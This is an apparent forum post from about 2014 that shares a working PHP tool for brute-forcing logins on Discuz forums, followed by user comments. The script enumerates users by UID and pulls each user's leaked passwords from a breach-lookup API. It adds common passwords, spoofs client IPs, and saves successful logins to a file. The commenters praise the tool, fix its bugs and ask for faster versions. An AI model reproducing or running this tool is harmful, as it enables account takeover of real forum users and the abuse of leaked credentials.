<?php class fuckdz{ public function sgk($user){ $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto="); $a=iconv("UTF-8", "GB2312//IGNORE", $a); preg_match_all("/7%\">(.*)</isU",$a,$arr); unset($arr[0]); foreach ($arr as $key=>$r){ return $r; } } public function getuid($host,$uid){ $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid"); if(!strpos($a,"charset=gbk")){ $a=iconv("UTF-8", "GB2312//IGNORE", $a); } preg_match("/<title>(.*)的/isU",$a,$arr); $a=str_replace("\r","",trim($arr[1])); return $a=str_replace("\n","",$a); } public function is_pass($host,$user,$pass){ $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244); $opts = array ( 'http' => array ( 'method' => 'GET', 'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx", 'timeout'=>15, ) ); $context = stream_context_create($opts); $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context); if(strpos($a,"window.location.href")){ return true; }else{ return false; } } public function crack($host,$a,$b){ $host=str_replace("http://","",$host); $host="http://".$host."/"; for($vip=$a;$vip<=$b;$vip++){ $user=$this->getuid($host,$vip); $pass=$this->sgk($user); array_push($pass,"123456"); array_push($pass,"654321"); array_push($pass,"123123"); array_push($pass,"woaini"); array_push($pass,"caonima"); array_push($pass,"12345"); array_push($pass,"12345789"); array_push($pass,"5201314"); array_push($pass,"1314520"); array_push($pass,$user); array_push($pass,$user."123456"); array_push($pass,"abc123"); array_push($pass,$user.".."); for($i=0;isset($pass[$i]);$i++){ echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i].""; if($this->is_pass($host,$user,$pass[$i])){ echo "爆破成功!"; break; file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND); }else{ echo "爆破失败"; } } } } } $f=new fuckdz(); error_reporting(0); set_time_limit(0); if(empty($argv[1])){ print_r(" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 开始爆破:php.exe $argv[0] 网址 起始uid 结束uid 示例: php.exe $argv[0] http://phpinfo.me/ 1 255 结果保存在ok.txt里 Blog:http://phpinfo.me +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n\n\n "); }else{ if(!empty($argv[1])){ $f->crack($argv[1],$argv[2],$argv[3]); }else{ echo "逗比"; } } ?>
开启手机验证码就不行了...
相关讨论:
1#
Siro | 2014-06-02 08:05
必须收藏……
2#
大白菜 | 2014-06-02 08:11
...不能调用社工库的API爆破?
3#
Sunshie (http://phpinfo.me欢迎友链) | 2014-06-02 08:12
@大白菜 本来就是调用社工库来爆破的
4#
围剿 | 2014-06-02 08:18
好东西 这个必须收藏!!亮点是社工库api啊。。
5#
小威 (呵呵复呵呵,女神敲回车!) | 2014-06-02 08:27
已收藏
6#
围剿 | 2014-06-02 09:09
@Sunshie api能用?我测试的api无效呢。
7#
侠之心 | 2014-06-02 10:36
我全部爆破失败了 凑
8#
null (#) | 2014-06-02 11:30
这么屌?
9#
Sunshie (http://phpinfo.me欢迎友链) | 2014-06-02 11:31
@侠之心 修改了下..http://phpinfo.me/2014/06/02/630.html
10#
stranger_1 (i am a stranger) | 2014-06-02 11:40
73,74行 对换 不然就看不到ok.txt 喽··
11#
thx | 2014-06-02 11:44
没法无视验证码啊
12#
侠之心 | 2014-06-02 11:51
@Sunshie 楼主 还是全部都是爆破失败
13#
侠之心 | 2014-06-02 11:54
@Sunshie 系不系这几个社工库不给力啊
14#
侠之心 | 2014-06-02 11:57
@stranger_1 正解
15#
null (#) | 2014-06-02 12:12
@stranger_1 换了也没看见传说中的ok.txt
16#
小胖子 (VIP你快回来,园长欺负我!) | 2014-06-02 12:14
给力
17#
phith0n (www.leavesongs.com) | 2014-06-02 12:32
没多线程速度怎么保证?
我有个py脚本用了很久了,速度快成功率高,不过我才不会发出来,哈哈~~
18#
′ 雨。 | 2014-06-02 12:48
@phith0n 我擦 师傅咋没给我说过。
19#
侠之心 | 2014-06-02 12:52
@null 那是因为没有成功一个 所以没出来 ok.txt
20#
侠之心 | 2014-06-02 12:53
@phith0n 。。。。。。。。。。。。。
求私聊 给脚本
21#
null (#) | 2014-06-02 12:58
@侠之心 生成在根目录了,现在看见了。
22#
侠之心 | 2014-06-02 13:09
@null 我还没成功过 凑
23#
LauRen (不登高山,不知天之高也;不临深溪,不知地之厚也。) | 2014-06-02 13:25
mark
留言评论(旧系统):